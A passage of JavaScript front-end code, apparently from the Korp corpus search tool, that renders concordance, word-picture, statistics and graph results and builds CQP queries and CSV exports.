break;\n }\n\n if (next) {\n this.scrollToShowWord($(next));\n return false;\n }\n }\n\n getPageInterval(page) {\n const hpp = locationSearch().hpp;\n const items_per_page = Number(hpp) || settings.hitsPerPageDefault;\n page = Number(page);\n const output = {};\n output.start = (page || 0) * items_per_page;\n output.end = output.start + items_per_page - 1;\n return output;\n }\n\n renderCompleteResult(data) {\n safeApply(this.s, () => {\n this.hidePreloader();\n this.s.hits = data.hits;\n this.s.hits_display = util.prettyNumbers(data.hits);\n });\n if (!data.hits) {\n c.log(`no kwic results`);\n this.showNoResults();\n return;\n }\n this.$result.removeClass(`zero_results`);\n this.renderHitsPicture(data);\n }\n\n renderResult(data) {\n const resultError = super.renderResult(data);\n if (resultError === false) {\n return;\n }\n if (!data.kwic) {\n data.kwic = [];\n }\n const isReading = this.isReadingMode();\n\n if (this.isActive()) {\n this.s.$root.jsonUrl = this.proxy.prevUrl;\n }\n\n this.s.$apply(($scope) => {\n const useContextData = locationSearch().in_order != null;\n if (isReading || useContextData) {\n $scope.setContextData(data);\n this.selectionManager.deselect();\n } else {\n $scope.setKwicData(data);\n }\n });\n\n if (currentMode === `parallel` && !isReading) {\n const scrollLeft = $(`.table_scrollarea`, this.$result).scrollLeft() || 0;\n let changed = true;\n const prevValues = [];\n\n // loop until the placement of linked sentences have settled\n while (changed) {\n changed = false;\n let i = 0;\n for (const linked of $(`.table_scrollarea > .kwic .linked_sentence`).get()) {\n const mainrow = $(linked).prev();\n if (!mainrow.length) {\n continue;\n }\n let firstWord = mainrow.find(`.left .word:first`);\n if (!firstWord.length) {\n firstWord = mainrow.find(`.match .word:first`);\n }\n const offset = Math.round(firstWord.position().left + scrollLeft - 25);\n $(linked).find(`.lnk`).css(`padding-left`, offset);\n\n const threshold = 25;\n if (offset - (prevValues[i] || 0) > threshold) {\n changed = true;\n }\n\n prevValues[i] = offset;\n i++;\n }\n }\n }\n\n if (settings.enableBackendKwicDownload) {\n util.setDownloadLinks(this.proxy.prevRequest, data);\n }\n\n this.$result.localize();\n this.centerScrollbar();\n if (this.isActive() && !this.selectionManager.hasSelected() && !isReading) {\n this.$result.find(`.match`).children().first().click();\n }\n }\n\n showNoResults() {\n this.hidePreloader();\n this.$result.addClass(`zero_results`).click();\n return this.$result.find(`.hits_picture`).html(``);\n }\n\n renderHitsPicture(data) {\n let items = _.map(data.corpus_order, (obj) => ({\n rid: obj,\n rtitle: settings.corpusListing.getTitle(obj.toLowerCase()),\n relative: data.corpus_hits[obj] / data.hits,\n abs: data.corpus_hits[obj],\n }));\n items = _.filter(items, (item) => item.abs > 0);\n // calculate which is the first page of hits for each item\n let index = 0;\n _.each(items, (obj) => {\n obj.page = Math.floor(index / data.kwic.length);\n index += obj.abs;\n });\n\n this.s.$apply(($scope) => ($scope.hitsPictureData = items));\n }\n\n scrollToShowWord(word) {\n if (!word.length) {\n return;\n }\n const offset = 200;\n const wordTop = word.offset().top;\n let newY = window.scrollY;\n if (wordTop > $(window).height() + window.scrollY) {\n newY += offset;\n } else if (wordTop < window.scrollY) {\n newY -= offset;\n }\n $(`html, body`).stop(true, true).animate({ scrollTop: newY });\n const wordLeft = word.offset().left;\n const area = this.$result.find(`.table_scrollarea`);\n let newX = Number(area.scrollLeft());\n if (wordLeft > area.offset().left + area.width()) {\n newX += offset;\n } else if (wordLeft < area.offset().left) {\n newX -= offset;\n }\n return area.stop(true, true).animate({ scrollLeft: newX });\n }\n\n buildQueryOptions(cqp, isPaging) {\n let avoidContext, preferredContext;\n const opts = {};\n const getSortParams = function () {\n const { sort } = locationSearch();\n if (!sort) {\n return {};\n }\n if (sort === `random`) {\n let rnd;\n if (locationSearch().random_seed) {\n rnd = locationSearch().random_seed;\n } else {\n rnd = Math.ceil(Math.random() * 10000000);\n locationSearch({ random_seed: rnd });\n }\n\n return {\n sort,\n random_seed: rnd,\n };\n }\n return { sort };\n };\n\n if (this.isReadingMode()) {\n preferredContext = settings.defaultReadingContext;\n avoidContext = settings.defaultOverviewContext;\n } else {\n preferredContext = settings.defaultOverviewContext;\n avoidContext = settings.defaultReadingContext;\n }\n\n const context = settings.corpusListing.getContextQueryString(preferredContext, avoidContext);\n\n if (!isPaging) {\n this.proxy.queryData = null;\n }\n\n opts.ajaxParams = {\n corpus: settings.corpusListing.stringifySelected(),\n cqp: cqp || this.proxy.prevCQP,\n query_data: this.proxy.queryData,\n context,\n default_context: preferredContext,\n incremental: true,\n };\n\n _.extend(opts.ajaxParams, getSortParams());\n return opts;\n }\n\n makeRequest(cqp, isPaging) {\n const page = Number(locationSearch().page) || 0;\n this.s.$parent.page = page;\n\n this.showPreloader();\n this.s.aborted = false;\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n }\n\n const params = this.buildQueryOptions(cqp, isPaging);\n const progressCallback = $.proxy(this.onProgress, this);\n\n const req = this.getProxy().makeRequest(params, page, progressCallback, (data) => {\n return this.renderResult(data);\n });\n req.done((data) => {\n this.hidePreloader();\n return this.renderCompleteResult(data);\n });\n return req.fail((jqXHR, status, errorThrown) => {\n c.log(`kwic fail`);\n if (this.ignoreAbort) {\n c.log(`stats ignoreabort`);\n return;\n }\n if (status === `abort`) {\n return safeApply(this.s, () => {\n this.hidePreloader();\n this.s.aborted = true;\n });\n }\n });\n }\n\n getActiveData() {\n if (this.isReadingMode()) {\n return this.s.contextKwic;\n } else {\n return this.s.kwic;\n }\n }\n\n centerScrollbar() {\n const m = this.$result.find(`.match:first`);\n if (!m.length) {\n return;\n }\n const area = this.$result.find(`.table_scrollarea`).scrollLeft(0);\n const match = m.first().position().left + m.width() / 2;\n const sidebarWidth = $(`#sidebar`).outerWidth() || 0;\n area.stop(true, true).scrollLeft(match - ($(`body`).innerWidth() - sidebarWidth) / 2);\n }\n\n getCurrentRow() {\n const tr = this.$result.find(`.token_selected`).closest(`tr`);\n if (this.$result.find(`.token_selected`).parent().is(`td`)) {\n return tr.find(`td > .word`);\n } else {\n return tr.find(`div > .word`);\n }\n }\n\n selectNext() {\n let next;\n if (!this.isReadingMode()) {\n const i = this.getCurrentRow().index(this.$result.find(`.token_selected`).get(0));\n next = this.getCurrentRow().get(i + 1);\n if (next == null) {\n return;\n }\n $(next).click();\n } else {\n next = this.$result.find(`.token_selected`).next().click();\n }\n return next;\n }\n\n selectPrev() {\n let prev;\n if (!this.isReadingMode()) {\n const i = this.getCurrentRow().index(this.$result.find(`.token_selected`).get(0));\n if (i === 0) {\n return;\n }\n prev = this.getCurrentRow().get(i - 1);\n $(prev).click();\n } else {\n prev = this.$result.find(`.token_selected`).prev().click();\n }\n return prev;\n }\n\n selectUp() {\n let prevMatch;\n const current = this.selectionManager.selected;\n if (!this.isReadingMode()) {\n prevMatch = this.getWordAt(\n current.offset().left + current.width() / 2,\n current.closest(`tr`).prevAll(`.not_corpus_info`).first(),\n );\n prevMatch.click();\n } else {\n const searchwords = current\n .prevAll(`.word`)\n .get()\n .concat(\n current\n .closest(`.not_corpus_info`)\n .prevAll(`.not_corpus_info`)\n .first()\n .find(`.word`)\n .get()\n .reverse(),\n );\n const def = current.parent().prev().find(`.word:last`);\n prevMatch = this.getFirstAtCoor(\n current.offset().left + current.width() / 2,\n $(searchwords),\n def,\n ).click();\n }\n\n return prevMatch;\n }\n\n selectDown() {\n let nextMatch;\n const current = this.selectionManager.selected;\n if (!this.isReadingMode()) {\n nextMatch = this.getWordAt(\n current.offset().left + current.width() / 2,\n current.closest(`tr`).nextAll(`.not_corpus_info`).first(),\n );\n nextMatch.click();\n } else {\n const searchwords = current\n .nextAll(`.word`)\n .add(\n current\n .closest(`.not_corpus_info`)\n .nextAll(`.not_corpus_info`)\n .first()\n .find(`.word`),\n );\n const def = current.parent().next().find(`.word:first`);\n nextMatch = this.getFirstAtCoor(\n current.offset().left + current.width() / 2,\n searchwords,\n def,\n ).click();\n }\n return nextMatch;\n }\n\n getFirstAtCoor(xCoor, wds, default_word) {\n let output = null;\n wds.each(function (i, item) {\n const thisLeft = $(this).offset().left;\n const thisRight = $(this).offset().left + $(this).width();\n if (xCoor > thisLeft && xCoor < thisRight) {\n output = $(this);\n return false;\n }\n });\n\n return output || default_word;\n }\n\n getWordAt(xCoor, $row) {\n let output = $();\n $row.find(`.word`).each(function () {\n output = $(this);\n const thisLeft = $(this).offset().left;\n const thisRight = $(this).offset().left + $(this).width();\n if ((xCoor > thisLeft && xCoor < thisRight) || thisLeft > xCoor) {\n return false;\n }\n });\n\n return output;\n }\n};\n\nview.ExampleResults = class ExampleResults extends view.KWICResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n this.proxy = new model.KWICProxy();\n if (this.s.$parent.kwicTab.queryParams) {\n this.makeRequest().then(() => {\n this.onentry();\n });\n }\n this.tabindex = this.getResultTabs().length - 1 + this.s.$parent.$index;\n }\n\n setupReadingHash() {}\n\n isReadingMode() {\n return this.s.exampleReadingMode;\n }\n\n makeRequest() {\n const items_per_page = parseInt(locationSearch().hpp || settings.hitsPerPageDefault);\n const opts = this.s.$parent.kwicTab.queryParams;\n\n this.resetView();\n // example tab cannot handle incremental = true\n opts.ajaxParams.incremental = false;\n\n opts.ajaxParams.start = this.s.$parent.page * items_per_page;\n opts.ajaxParams.end = opts.ajaxParams.start + items_per_page - 1;\n\n const prev = _.pick(this.proxy.prevParams, `cqp`, `command`, `corpus`, `source`);\n _.extend(opts.ajaxParams, prev);\n\n let avoidContext, preferredContext;\n if (this.isReadingMode()) {\n preferredContext = settings.defaultReadingContext;\n avoidContext = settings.defaultOverviewContext;\n } else {\n preferredContext = settings.defaultOverviewContext;\n avoidContext = settings.defaultReadingContext;\n }\n\n const context = settings.corpusListing.getContextQueryStringFromCorpusId(\n (prev.corpus || ``).split(`,`),\n preferredContext,\n avoidContext,\n );\n _.extend(opts.ajaxParams, { context, default_context: preferredContext });\n\n this.showPreloader();\n const progress =\n opts.command === `relations_sentences` ? $.noop : $.proxy(this.onProgress, this);\n const def = this.proxy.makeRequest(opts, null, progress, (data) => {\n this.renderResult(data, opts.cqp);\n this.renderCompleteResult(data);\n return safeApply(this.s, () => {\n return this.hidePreloader();\n });\n });\n\n return def.fail(function () {\n return safeApply(this.s, () => {\n return this.hidePreloader();\n });\n });\n }\n\n renderResult(data) {\n super.renderResult(data);\n this.s.setupReadingWatch();\n }\n};\n\nview.LemgramResults = class LemgramResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n this.s = scope;\n this.tabindex = 3;\n this.proxy = new model.LemgramProxy();\n }\n\n resetView() {\n super.resetView();\n safeApply(this.s, () => {\n this.s.$parent.aborted = false;\n this.s.$parent.no_hits = false;\n });\n }\n\n makeRequest(word, type) {\n // if a global filter is set, do not generate a word picture\n if (this.s.$root.globalFilter) {\n this.hasData = false;\n return;\n }\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n this.resetView();\n }\n\n this.showPreloader();\n const def = this.proxy.makeRequest(word, type, (...args) => {\n this.onProgress(...(args || []));\n });\n\n def.done((data) => {\n safeApply(this.s, () => {\n return this.renderResult(data, word);\n });\n });\n def.fail((jqXHR, status, errorThrown) => {\n c.log(`def fail`, status);\n if (this.ignoreAbort) {\n return;\n }\n if (status === `abort`) {\n return safeApply(this.s, () => {\n this.hidePreloader();\n this.s.$parent.aborted = true;\n });\n }\n });\n }\n\n renderResult(data, query) {\n const resultError = super.renderResult(data);\n this.hidePreloader();\n this.s.$parent.progress = 100;\n if (resultError === false) {\n return;\n }\n if (!data.relations) {\n this.s.$parent.no_hits = true;\n } else if (util.isLemgramId(query)) {\n this.renderTables(query, data.relations);\n } else {\n this.renderWordTables(query, data.relations);\n }\n }\n\n renderWordTables(word, data) {\n const wordlist = $.map(data, function (item) {\n const output = [];\n if (item.head.split(`_`)[0] === word) {\n output.push([item.head, item.headpos.toLowerCase()]);\n }\n if (item.dep.split(`_`)[0] === word) {\n output.push([item.dep, item.deppos.toLowerCase()]);\n }\n return output;\n });\n let unique_words = _.uniqBy(wordlist, function (...args) {\n const [word, pos] = args[0];\n return word + pos;\n });\n const tagsetTrans = _.invert(settings.wordpictureTagset);\n unique_words = _.filter(unique_words, function (...args) {\n const [currentWd, pos] = args[0];\n return settings.wordPictureConf[tagsetTrans[pos]] != null;\n });\n if (!unique_words.length) {\n this.showNoResults();\n return;\n }\n\n this.drawTables(unique_words, data);\n return this.hidePreloader();\n }\n\n renderTables(lemgram, data) {\n let wordClass;\n if (data[0].head === lemgram) {\n wordClass = data[0].headpos;\n } else {\n wordClass = data[0].deppos;\n }\n this.drawTables([[lemgram, wordClass]], data);\n return this.hidePreloader();\n }\n\n drawTables(tables, data) {\n const inArray = function (rel, orderList) {\n const i = _.findIndex(\n orderList,\n (item) =>\n (item.field_reverse || false) === (rel.field_reverse || false) &&\n item.rel === rel.rel,\n );\n const type = rel.field_reverse ? `head` : `dep`;\n return {\n i,\n type,\n };\n };\n\n const tagsetTrans = _.invert(settings.wordpictureTagset);\n\n const res = _.map(tables, function ([token, wordClass]) {\n const getRelType = (item) => ({\n rel: tagsetTrans[item.rel.toLowerCase()],\n field_reverse: item.dep === token,\n });\n\n const wordClassShort = wordClass.toLowerCase();\n wordClass = _.invert(settings.wordpictureTagset)[wordClassShort];\n\n if (settings.wordPictureConf[wordClass] == null) {\n return;\n }\n let orderArrays = [[], [], []];\n $.each(data, (index, item) => {\n $.each(settings.wordPictureConf[wordClass] || [], (i, rel_type_list) => {\n const list = orderArrays[i];\n const rel = getRelType(item);\n\n if (!rel) {\n return;\n }\n const ret = inArray(rel, rel_type_list);\n if (ret.i === -1) {\n return;\n }\n if (!list[ret.i]) {\n list[ret.i] = [];\n }\n item.show_rel = ret.type;\n list[ret.i].push(item);\n });\n });\n\n $.each(orderArrays, function (i, unsortedList) {\n $.each(unsortedList, function (_, list) {\n if (list) {\n list.sort((first, second) => second.mi - first.mi);\n }\n });\n\n if (settings.wordPictureConf[wordClass][i] && unsortedList.length) {\n const toIndex = $.inArray(`_`, settings.wordPictureConf[wordClass][i]);\n if (util.isLemgramId(token)) {\n unsortedList[toIndex] = { word: token.split(`..`)[0].replace(/_/g, ` `) };\n } else {\n unsortedList[toIndex] = { word: util.lemgramToString(token) };\n }\n }\n\n unsortedList = _.filter(unsortedList, (item, index) => Boolean(item));\n });\n\n orderArrays = _.map(orderArrays, (section, i) =>\n _.map(section, function (table, j) {\n if (table && table[0]) {\n const { rel } = table[0];\n const { show_rel } = table[0];\n const all_lemgrams = _.uniq(\n _.map(_.map(table, show_rel), function (item) {\n if (util.isLemgramId(item)) {\n return item.slice(0, -1);\n } else {\n return item;\n }\n }),\n );\n return { table, rel, show_rel, all_lemgrams };\n } else {\n return { table };\n }\n }),\n );\n\n return {\n token: token,\n wordClass: wordClass,\n wordClassShort: wordClassShort,\n data: orderArrays,\n };\n });\n\n return this.s.$root.$broadcast(`word_picture_data_available`, res);\n }\n\n onentry() {\n super.onentry();\n }\n\n onexit() {\n super.onexit();\n clearTimeout(self.timeout);\n }\n\n showNoResults() {\n this.hidePreloader();\n }\n};\n\nview.StatsResults = class StatsResults extends BaseResults {\n constructor(resultSelector, tabSelector, scope) {\n super(resultSelector, tabSelector, scope);\n const self = this;\n this.tabindex = 2;\n this.gridData = null;\n\n this.doSort = true;\n this.sortColumn = null;\n\n this.proxy = new model.StatsProxy();\n window.statsProxy = this.proxy;\n this.$result.on(`click`, `.arcDiagramPicture`, (event) => {\n const parts = $(event.currentTarget).attr(`id`).split(`__`);\n return this.showPieChart(parseInt(parts[1]));\n });\n\n this.$result.on(`click`, `.slick-cell .statistics-link`, (e) => {\n let rowData;\n const rowIx = $(e.currentTarget).data(`row`);\n // TODO don't loop\n for (const row of this.data) {\n if (row.rowId === parseInt(rowIx)) {\n rowData = row;\n break;\n }\n }\n let cqp2 = null;\n // isPhraseLevelDisjunction: used for constructing cqp like: ([] | [])\n if (rowData.isPhraseLevelDisjunction) {\n const tokens = rowData.statsValues.map((vals) =>\n statisticsFormatting.getCqp(vals, this.searchParams.ignoreCase),\n );\n cqp2 = tokens.join(` | `);\n } else {\n cqp2 = statisticsFormatting.getCqp(\n rowData.statsValues,\n this.searchParams.ignoreCase,\n );\n }\n const { corpora } = this.searchParams;\n\n const opts = {};\n opts.ajaxParams = {\n start: 0,\n end: 24,\n corpus: corpora.join(`,`),\n cqp: self.proxy.prevParams.cqp,\n cqp2,\n expand_prequeries: false,\n };\n\n return safeApply(scope.$root, () => scope.$root.kwicTabs.push({ queryParams: opts }));\n });\n\n $(window).resize(\n _.debounce(() => {\n return this.resizeGrid(true);\n }, 100),\n );\n\n $(`#kindOfData,#kindOfFormat`).change(() => {\n return this.showGenerateExport();\n });\n\n $(`#exportButton`).hide();\n $(`#generateExportButton`)\n .unbind(`click`)\n .click(() => {\n this.hideGenerateExport();\n this.updateExportBlob();\n });\n\n if ($(`html.msie7,html.msie8`).length) {\n $(`#showGraph`).hide();\n return;\n }\n\n $(`#showGraph`).on(`click`, () => {\n let cqp, rowIx;\n if ($(`#showGraph`).is(`.disabled`)) {\n return;\n }\n\n const subExprs = [];\n const labelMapping = {};\n\n let showTotal = false;\n\n for (rowIx of this.getSelectedRows()) {\n if (rowIx === 0) {\n showTotal = true;\n continue;\n }\n\n var row = this.getDataAt(rowIx);\n cqp = statisticsFormatting.getCqp(row.statsValues, this.searchParams.ignoreCase);\n subExprs.push(cqp);\n const parts = this.searchParams.reduceVals.map(\n (reduceVal) => row.formattedValue[reduceVal],\n );\n labelMapping[cqp] = parts.join(`, `);\n }\n\n const activeCorpora = [];\n // TODO: what is this rowIx reference?\n const totalRow = this.getDataAt(rowIx);\n for (const corpus of this.searchParams.corpora) {\n if (totalRow[corpus + `_value`][0] > 0) {\n activeCorpora.push(corpus);\n }\n }\n\n this.s.$apply(() => {\n this.s.onGraphShow({\n cqp: this.proxy.prevNonExpandedCQP,\n subcqps: subExprs,\n labelMapping,\n showTotal,\n corpusListing: settings.corpusListing.subsetFactory(activeCorpora),\n });\n });\n });\n }\n\n updateExportBlob() {\n let reduceVal, val;\n const selVal = $(`#kindOfData option:selected`).val() === `absolute` ? 0 : 1;\n const selType = $(`#kindOfFormat option:selected`).val();\n let dataDelimiter = `;`;\n if (selType === `tsv`) {\n dataDelimiter = `\\t`;\n }\n const cl = settings.corpusListing.subsetFactory(this.searchParams.corpora);\n\n let header = [];\n for (reduceVal of this.searchParams.reduceVals) {\n header.push(reduceVal);\n }\n\n header.push(util.getLocaleString(`stats_total`));\n header = header.concat(_.map(cl.corpora, `title`));\n\n const fmt = (what) => what.toString();\n\n const output = [];\n for (var row of this.data) {\n const outputRow = this.searchParams.reduceVals.map((reduceVal) => {\n if (row.rowId === 0) {\n return `Σ`;\n } else {\n return row[reduceVal].join(`,`);\n }\n });\n outputRow.push(fmt(row.total_value[selVal]));\n for (const corp of this.searchParams.corpora) {\n val = row[corp + `_value`][selVal];\n if (val) {\n outputRow.push(fmt(val));\n } else {\n outputRow.push(`0`);\n }\n }\n output.push(outputRow);\n }\n\n const csv = new CSV(output, {\n header,\n delimiter: dataDelimiter,\n });\n\n const csvstr = csv.encode();\n\n const blob = new Blob([csvstr], { type: `text/${selType}` });\n const csvUrl = URL.createObjectURL(blob);\n\n $(`#exportButton`, this.$result).attr({\n download: `export.${selType}`,\n href: csvUrl,\n });\n }\n\n makeRequest(cqp) {\n const grid = document.getElementById(`myGrid`);\n grid.innerHTML = ``;\n\n this.s.hasResult = false;\n if (!this.s.shouldSearch()) {\n return;\n }\n\n this.s.hasResult = true;\n\n if (currentMode === `parallel`) {\n cqp = cqp.replace(/\\:LINKED_CORPUS.*/, ``);\n }\n\n if (this.proxy.hasPending()) {\n this.ignoreAbort = true;\n } else {\n this.ignoreAbort = false;\n this.resetView();\n }\n\n this.showPreloader();\n this.proxy\n .makeRequest(cqp, (...args) => this.onProgress(...(args || [])))\n .then(\n (...args) => {\n const [data, columns, searchParams] = args[0];\n safeApply(this.s, () => {\n return this.hidePreloader();\n });\n this.data = data;\n this.searchParams = searchParams;\n return this.renderResult(columns, data);\n },\n (textStatus, err) => {\n c.log(`fail`, arguments);\n c.log(\n `stats fail`,\n this.s.$parent.loading,\n _.map(this.proxy.pendingRequests, (item) => item.readyState),\n );\n if (this.ignoreAbort) {\n c.log(`stats ignoreabort`);\n return;\n }\n safeApply(this.s, () => {\n this.hidePreloader();\n if (textStatus === `abort`) {\n this.s.aborted = true;\n } else {\n this.resultError(err);\n }\n });\n },\n );\n }\n\n getSelectedRows() {\n if (this.grid) {\n return this.grid.getSelectedRows().sort();\n } else {\n return [];\n }\n }\n\n getDataAt(rowIx) {\n return this.grid.getData()[rowIx];\n }\n\n showGenerateExport() {\n $(`#exportButton`).hide();\n $(`#generateExportButton`).show();\n }\n\n hideGenerateExport() {\n $(`#exportButton`).show();\n $(`#generateExportButton`).hide();\n }\n\n renderResult(columns, data) {\n if (this.isActive()) {\n this.s.$root.jsonUrl = this.proxy.prevUrl;\n }\n\n this.showGenerateExport();\n\n const refreshHeaders = () =>\n $(`.localized-header .slick-column-name`)\n .not(`[rel^=localize]`)\n .each(function () {\n return $(this).localeKey($(this).text());\n });\n\n this.gridData = data;\n const resultError = super.renderResult(data);\n if (resultError === false) {\n return;\n }\n\n if (data[0].total_value.absolute === 0) {\n safeApply(this.s, () => {\n this.s.no_hits = true;\n });\n return;\n }\n\n const checkboxSelector = new Slick.CheckboxSelectColumn({\n cssClass: `slick-cell-checkboxsel`,\n });\n\n columns = [checkboxSelector.getColumnDefinition()].concat(columns);\n\n const grid = new Slick.Grid($(`#myGrid`), data, columns, {\n enableCellNavigation: false,\n enableColumnReorder: false,\n forceFitColumns: false,\n });\n\n grid.setSelectionModel(new Slick.RowSelectionModel({ selectActiveRow: false }));\n grid.registerPlugin(checkboxSelector);\n this.grid = grid;\n this.grid.autosizeColumns();\n\n this.s.totalNumberOfRows = this.grid.getDataLength();\n\n grid.onSort.subscribe((e, args) => {\n if (this.doSort) {\n const sortColumns = grid.getSortColumns()[0];\n this.sortColumn = sortColumns.columnId;\n this.sortAsc = sortColumns.sortAsc;\n const { sortCol } = args;\n data.sort(function (a, b) {\n let x, y;\n if (a.id === `row_total`) {\n return -1;\n }\n if (b.id === `row_total`) {\n return -1;\n }\n if (sortCol.field === `hit_value`) {\n x = a[sortColumns.columnId];\n y = b[sortColumns.columnId];\n } else {\n x = a[sortCol.field][0] || 0;\n y = b[sortCol.field][0] || 0;\n }\n let ret = x === y ? 0 : x > y ? 1 : -1;\n if (!args.sortAsc) {\n ret *= -1;\n }\n return ret;\n });\n\n grid.setData(data);\n grid.updateRowCount();\n return grid.render();\n } else {\n if (this.sortColumn) {\n return grid.setSortColumn(this.sortColumn, this.sortAsc);\n } else {\n return grid.setSortColumns([]);\n }\n }\n });\n\n grid.onColumnsResized.subscribe((e, args) => {\n this.doSort = false; // if sort event triggered, sorting will not occur\n this.resizeGrid(false);\n return e.stopImmediatePropagation();\n });\n\n grid.onHeaderClick.subscribe((e, args) => {\n this.doSort = true; // enable sorting again, resize is done\n return e.stopImmediatePropagation();\n });\n\n grid.onHeaderCellRendered.subscribe((e, args) => refreshHeaders());\n\n refreshHeaders();\n $(`.slick-row:first input`, this.$result).click();\n $(window).trigger(`resize`);\n\n $.when(window.timeDeferred).then(() => {\n safeApply(this.s, () => {\n this.updateGraphBtnState();\n });\n });\n\n this.s.getGeoAttributes(this.searchParams.corpora);\n\n safeApply(this.s, () => {\n this.hidePreloader();\n });\n }\n\n updateGraphBtnState() {\n this.s.graphEnabled = true;\n const cl = settings.corpusListing.subsetFactory(this.searchParams.corpora);\n if (!_.compact(cl.getTimeInterval()).length) {\n this.s.graphEnabled = false;\n }\n }\n\n resizeGrid(resizeColumns) {\n let width;\n let height = 0;\n $(`.slick-row`).each(function () {\n height += $(this).outerHeight(true);\n });\n $(`#myGrid:visible.slick-viewport`).height(height);\n\n // adding 20 px to width if vertical scrollbar appears\n if ((this.gridData != null ? this.gridData.length : undefined) * 25 >= height) {\n width = 20;\n } else {\n width = 0;\n }\n\n $(`.slick-header-column`).each(function () {\n width += $(this).outerWidth(true);\n });\n if (width > $(window).width() - 40) {\n width = $(window).width() - 40;\n }\n $(`#myGrid:visible.slick-viewport`).width(width);\n\n if (this.grid != null) {\n this.grid.resizeCanvas();\n if (resizeColumns) {\n this.grid.autosizeColumns();\n }\n }\n return this.grid != null ? this.grid.invalidate() : undefined;\n }\n\n showPieChart(rowId) {\n let statsSwitchInstance;\n this.pieChartCurrentRowId = rowId;\n\n const getDataItems = (rowId, valueType) => {\n const dataItems = [];\n if (valueType === `relative`) {\n valueType = 1;\n } else {\n valueType = 0;\n }\n for (const row of this.data) {\n if (row.rowId === rowId) {\n for (const corpus of this.searchParams.corpora) {\n const freq = row[corpus + `_value`][valueType];\n dataItems.push({\n value: freq,\n caption:\n settings.corpora[corpus.toLowerCase()].title +\n `: ` +\n util.formatDecimalString(freq.toString()),\n shape_id: rowId,\n });\n }\n break;\n }\n }\n return dataItems;\n };\n\n $(`#dialog`).remove();\n\n const relHitsString = util.getLocaleString(`statstable_relfigures_hits`);\n $(`<div id='dialog' />`)\n .appendTo(`body`)\n .append(\n `<div id=\"pieDiv\"><br/><div id=\"statistics_switch\" style=\"text-align:center\">\n <a href=\"javascript:\" rel=\"localize[statstable_relfigures]\" data-mode=\"relative\">Relativa frekvenser</a>\n <a href=\"javascript:\" rel=\"localize[statstable_absfigures]\" data-mode=\"absolute\">Absoluta frekvenser</a>\n </div>\n <div id=\"chartFrame\" style=\"height:380\"></div>\n <p id=\"hitsDescription\" style=\"text-align:center\" rel=\"localize[statstable_absfigures_hits]\">${relHitsString}</p>\n </div>`,\n )\n .dialog({\n width: 400,\n height: 500,\n close() {\n return $(`#pieDiv`).remove();\n },\n })\n .css(`opacity`, 0)\n .parent()\n .find(`.ui-dialog-title`)\n .localeKey(`statstable_hitsheader_lemgram`);\n\n $(`#dialog`).fadeTo(400, 1);\n $(`#dialog`).find(`a`).blur(); // Prevents the focus of the first link in the \"dialog\"\n\n const stats2Instance = $(`#chartFrame`).pie_widget({\n container_id: `chartFrame`,\n data_items: getDataItems(rowId, `relative`),\n });\n statsSwitchInstance = $(`#statistics_switch`).radioList({\n change: () => {\n let loc;\n const typestring = statsSwitchInstance.radioList(`getSelected`).attr(`data-mode`);\n stats2Instance.pie_widget(\n `newData`,\n getDataItems(this.pieChartCurrentRowId, typestring),\n );\n if (typestring === `absolute`) {\n loc = `statstable_absfigures_hits`;\n } else {\n loc = `statstable_relfigures_hits`;\n }\n return $(`#hitsDescription`).localeKey(loc);\n },\n selected: `relative`,\n });\n }\n\n onentry() {\n // workaround for bug in slickgrid\n // slickgrid should add this automatically, but doesn't\n $(`#myGrid`).css(`position`, `relative`);\n\n super.onentry();\n $(window).trigger(`resize`);\n }\n\n resetView() {\n super.resetView();\n $(`myGrid`).empty();\n $(`#exportStatsSection`).show();\n $(`#exportButton`).attr({\n download: null,\n href: null,\n });\n this.s.no_hits = false;\n this.s.aborted = false;\n }\n};\n\nview.GraphResults = class GraphResults extends BaseResults {\n constructor(tabSelector, resultSelector, scope) {\n super(tabSelector, resultSelector, scope);\n\n this.validZoomLevels = [`year`, `month`, `day`, `hour`, `minute`, `second`];\n this.granularities = {\n year: `y`,\n month: `m`,\n day: `d`,\n hour: `h`,\n minute: `n`,\n second: `s`,\n };\n\n this.zoom = `year`;\n this.proxy = new model.GraphProxy();\n\n const [from, to] = settings.corpusListing.getMomentInterval();\n\n this.checkZoomLevel(from, to, true);\n\n $(`.chart`, this.$result).on(`click`, (event) => {\n const target = $(`.chart`, this.$result);\n const val = $(`.detail .x_label > span`, target).data(`val`);\n let cqp = $(`.detail .item.active > span`, target).data(`cqp`);\n\n if (cqp) {\n let timecqp;\n cqp = CQP.expandOperators(decodeURIComponent(cqp));\n const m = moment(val * 1000);\n\n const datefrom = moment(m).startOf(this.zoom).format(`YYYYMMDD`);\n const dateto = moment(m).endOf(this.zoom).format(`YYYYMMDD`);\n if (this.validZoomLevels.indexOf(this.zoom) < 3) {\n // year, month, day\n timecqp = `[(int(_.text_datefrom) >= ${datefrom} & int(_.text_dateto) <= ${dateto}) |\n (int(_.text_datefrom) <= ${datefrom} & int(_.text_dateto) >= ${dateto})\n ]`;\n } else {\n // hour, minute, second\n const timefrom = moment(m).startOf(this.zoom).format(`HHmmss`);\n const timeto = moment(m).endOf(this.zoom).format(`HHmmss`);\n timecqp = `[(int(_.text_datefrom) = ${datefrom} &\n int(_.text_timefrom) >= ${timefrom} &\n int(_.text_dateto) <= ${dateto} &\n int(_.text_timeto) <= ${timeto}) |\n ((int(_.text_datefrom) < ${datefrom} |\n (int(_.text_datefrom) = ${datefrom} & int(_.text_timefrom) <= ${timefrom})\n ) &\n (int(_.text_dateto) > ${dateto} |\n (int(_.text_dateto) = ${dateto} & int(_.text_timeto) >= ${timeto})\n ))]`;\n }\n\n const n_tokens = this.s.data.cqp.split(`]`).length - 2;\n\n timecqp = [timecqp].concat(_.map(_.range(0, n_tokens), () => `[]`)).join(` `);\n\n const opts = {};\n opts.ajaxParams = {\n start: 0,\n end: 24,\n corpus: this.s.data.corpusListing.stringifySelected(),\n cqp: this.s.data.cqp,\n cqp2: timecqp,\n expand_prequeries: false,\n };\n\n safeApply(this.s.$root, () => {\n this.s.$root.kwicTabs.push({ queryParams: opts });\n });\n }\n });\n }\n\n drawPreloader(from, to) {\n let left, width;\n if (this.graph) {\n left = this.graph.x(from.unix());\n width = this.graph.x(to.unix()) - left;\n } else {\n left = 0;\n width = `100%`;\n }\n\n $(`.preloader`, 